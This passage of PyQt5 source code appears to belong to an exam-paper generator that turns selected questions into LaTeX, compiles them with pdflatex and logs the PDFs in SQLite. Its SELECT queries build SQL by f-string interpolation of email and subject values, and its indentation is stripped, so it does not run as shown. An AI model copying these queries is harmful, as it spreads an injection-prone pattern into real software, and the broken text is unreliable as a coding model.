self.lineEdit_13 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_13.setGeometry(QtCore.QRect(200, 530, 133, 25))
self.lineEdit_13.setObjectName("lineEdit_12")
self.lineEdit_12 = QtWidgets.QTextEdit(self.centralwidget)
self.lineEdit_12.setGeometry(QtCore.QRect(200, 580, 220, 80))
self.lineEdit_12.setObjectName("lineEdit_12")
self.GenerateDoc = QtWidgets.QPushButton(self.centralwidget)
self.GenerateDoc.setGeometry(QtCore.QRect(650, 530, 170, 35))
self.GenerateDoc.setObjectName("generate")
self.GenerateDoc.setStyleSheet("QPushButton#generate{\n"
" background-color: rgb(2, 114, 118);\n"
" font: 10pt \"Arial\";\n"
" color: rgba(255, 255, 255, 200);\n"
" border-radius: 10px;\n"
"}\n"
"\n"
"QPushButton#generate:pressed{\n"
" padding-left:5px;\n"
" padding-top:5px;\n"
" background-color:rgba(255, 107, 107, 255);\n"
" background-position:calc(100% . 10px)center;\n"
"}\n"
"\n"
"QPushButton#generate:hover{\n"
" background-color: rgba(255, 255, 255, 255);\n"
" color:rgb(2, 114, 118);\n"
" border:2px solid;\n"
" border-color:rgb(2, 114, 118);\n"
"}\n"
"\n"
"")
self.RandomSearch = QtWidgets.QPushButton(self.centralwidget)
self.RandomSearch.setGeometry(QtCore.QRect(490, 530, 130, 35))
self.RandomSearch.setObjectName("random")
self.RandomSearch.setStyleSheet("QPushButton#random{\n"
" background-color: rgb(2, 114, 118);\n"
" font: 10pt \"Arial\";\n"
" color: rgba(255, 255, 255, 200);\n"
" border-radius: 10px;\n"
"}\n"
"\n"
"QPushButton#random:pressed{\n"
" padding-left:5px;\n"
" padding-top:5px;\n"
" background-color:rgba(255, 107, 107, 255);\n"
" background-position:calc(100% . 10px)center;\n"
"}\n"
"\n"
"QPushButton#random:hover{\n"
" background-color: rgba(255, 255, 255, 255);\n"
" color:rgb(2, 114, 118);\n"
" border:2px solid;\n"
" border-color:rgb(2, 114, 118);\n"
"}\n"
"\n"
"")
self.AllFetch = QtWidgets.QPushButton(self.centralwidget)
self.AllFetch.setGeometry(QtCore.QRect(560, 580, 130, 35))
self.AllFetch.setObjectName("random")
self.AllFetch.setStyleSheet("QPushButton#random{\n"
" background-color: rgb(2, 114, 118);\n"
" font: 10pt \"Arial\";\n"
" color: rgba(255, 255, 255, 200);\n"
" border-radius: 10px;\n"
"}\n"
"\n"
"QPushButton#random:pressed{\n"
" padding-left:5px;\n"
" padding-top:5px;\n"
" background-color:rgba(255, 107, 107, 255);\n"
" background-position:calc(100% . 10px)center;\n"
"}\n"
"\n"
"QPushButton#random:hover{\n"
" background-color: rgba(255, 255, 255, 255);\n"
" color:rgb(2, 114, 118);\n"
" border:2px solid;\n"
" border-color:rgb(2, 114, 118);\n"
"}\n"
"\n"
"")
self.RandomSearch.clicked.connect(self.viewRandomly)
self.GenerateDoc.clicked.connect(self.save_var_latex)
self.AllFetch.clicked.connect(self.fullfecth)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def save_var_latex(self):
try:
self.sub = str(self.comboBox.currentText())
self.typ = str(self.comboBox_2.currentText())
self.tn = str(self.label1.text())
self.d = str(self.lineEdit_3.date().toPyDate())
self.t = str(self.lineEdit_4.time().toPyTime())
self.cc = str(self.comboBox_6.currentText())
self.ct = str(self.comboBox_5.currentText())
self.tm = str(self.lineEdit_8.text())
self.et = str(self.comboBox_4.currentText())
self.Sy = str(self.comboBox_3.currentText())
self.est = str(self.lineEdit_11.text())
self.ifs = str(self.lineEdit_12.toPlainText())
paths = []
self.selected = self.tableView.selectedItems()
print(self.selected)
if self.selected:
print("go")
for item in self.selected:
print("go")
print(item.column())
if item.column() == 1:
print(item.column())
print("go")
paths.append(item.data(0))
print("go")
else:
print('select the rows')
print(paths)
print(len(paths))
#\Objective \\\\\\\\\\\\\\\\\\\\\\\Objective \\\\\\\\\\\\\\\\\\\\\\\\\ Objective
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 1 Row Selected
if len(paths) == 1 and self.typ == "Objective":
self.val1 = paths[0]
print(self.val1)
self.comma = self.val1.count(',')
print(self.comma)
self.dic = self.val1.split(',', self.comma)
print(self.dic)
self.spli = f'sj'
self.tag = '{oneparchoices}'
if self.comma == 2:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
else:
print('yes')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif self.comma == 3:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif self.comma == 4:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif self.comma == 5:
self.spli = self.dic[0]
print('ok')
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \choice {self.dic[5]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 2 Rows Selected \\\\\\\\\\\\\\\\\\\\\\\\\\\\
elif len(paths) == 2 and self.typ == "Objective":
self.val1 = paths[0]
self.val2 = paths[1]
self.comma = self.val1.count(',')
self.dic = self.val1.split(',', self.comma)
self.objec = f'gha'
self.objec1 = f'gha'
self.spli = ''
self.spli1 = ''
self.comma2 = self.val2.count(',')
self.dic2 = self.val2.split(',', self.comma2)
self.tag = '{oneparchoices}'
if self.comma == 2:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
else:
print('yes')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \end{self.tag}'
elif self.comma == 3:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \end{self.tag}'
elif self.comma == 4:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \end{self.tag}'
elif self.comma == 5:
self.spli = self.dic[0]
print('ok')
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \choice {self.dic[5]} \end{self.tag}'
#///////////////// option 2
if self.comma2 == 2:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
else:
print('yes')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \end{self.tag}'
elif self.comma2 == 3:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \end{self.tag}'
elif self.comma2 == 4:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \end{self.tag}'
elif self.comma2 == 5:
self.spli1 = self.dic2[0]
print('ok')
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \choice {self.dic2[5]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'question2':self.spli1,
'options1':self.objec,
'options2':self.objec1,
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 3 Rows Selected \\\\\\\\\\\\\\\\\\\\\\\\\
elif len(paths) == 3 and self.typ == "Objective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.comma = self.val1.count(',')
self.dic = self.val1.split(',', self.comma)
self.comma2 = self.val2.count(',')
self.dic2 = self.val2.split(',', self.comma2)
self.comma3 = self.val3.count(',')
self.dic3 = self.val3.split(',', self.comma3)
self.objec = f'gha'
self.objec1 = f'gha'
self.objec2 = f'gha'
self.spli = ''
self.spli1 = ''
self.spli2 = ''
self.tag = '{oneparchoices}'
if self.comma == 2:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
else:
print('yes')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \end{self.tag}'
elif self.comma == 3:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \end{self.tag}'
elif self.comma == 4:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \end{self.tag}'
elif self.comma == 5:
self.spli = self.dic[0]
print('ok')
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \choice {self.dic[5]} \end{self.tag}'
#///////////////// option 2
if self.comma2 == 2:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
else:
print('yes')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \end{self.tag}'
elif self.comma2 == 3:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \end{self.tag}'
elif self.comma2 == 4:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \end{self.tag}'
elif self.comma2 == 5:
self.spli1 = self.dic2[0]
print('ok')
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \choice {self.dic2[5]} \end{self.tag}'
#\\\\\\\\\\\\\\\\\\ option 3
if self.comma3 == 2:
self.spli2 = self.dic3[0]
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
else:
print('yes')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \end{self.tag}'
elif self.comma3 == 3:
self.spli2 = self.dic3[0]
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \choice {self.dic3[3]} \end{self.tag}'
elif self.comma3 == 4:
self.spli2 = self.dic3[0]
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \choice {self.dic3[3]} \choice {self.dic3[4]} \end{self.tag}'
elif self.comma3 == 5:
self.spli2 = self.dic3[0]
print('ok')
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \choice {self.dic3[3]} \choice {self.dic3[4]} \choice {self.dic3[5]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'question2':self.spli1,
'question3':self.spli2,
'options1':self.objec,
'options2':self.objec1,
'options3':self.objec2,
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
#else:
# self.Dialog = QtWidgets.QDialog()
# self.ui = Ui_Email()
# self.ui.setupUi(self.Dialog)
# self.Dialog.setWindowTitle("Alert!")
# self.ui.label.setText("Select within the range (3)")
# self.Dialog.show()
#print("select within the range (3)")
#\Subjective \\\\\\\\\\\\\\\\\\\\\\\Subjective \\\\\\\\\\\\\\\\\\\\\\\\\ Subjective
if len(paths) == 1 and self.typ == "Subjective":
self.val1 = paths[0]
if '\*' in self.val1:
self.val1 = self.val1.replace('\*', '\\\\')
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':'',
'question3':'',
'question4':'',
'question5':'',
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 2 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':'',
'question4':'',
'question5':'',
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 3 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':'',
'question5':'',
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
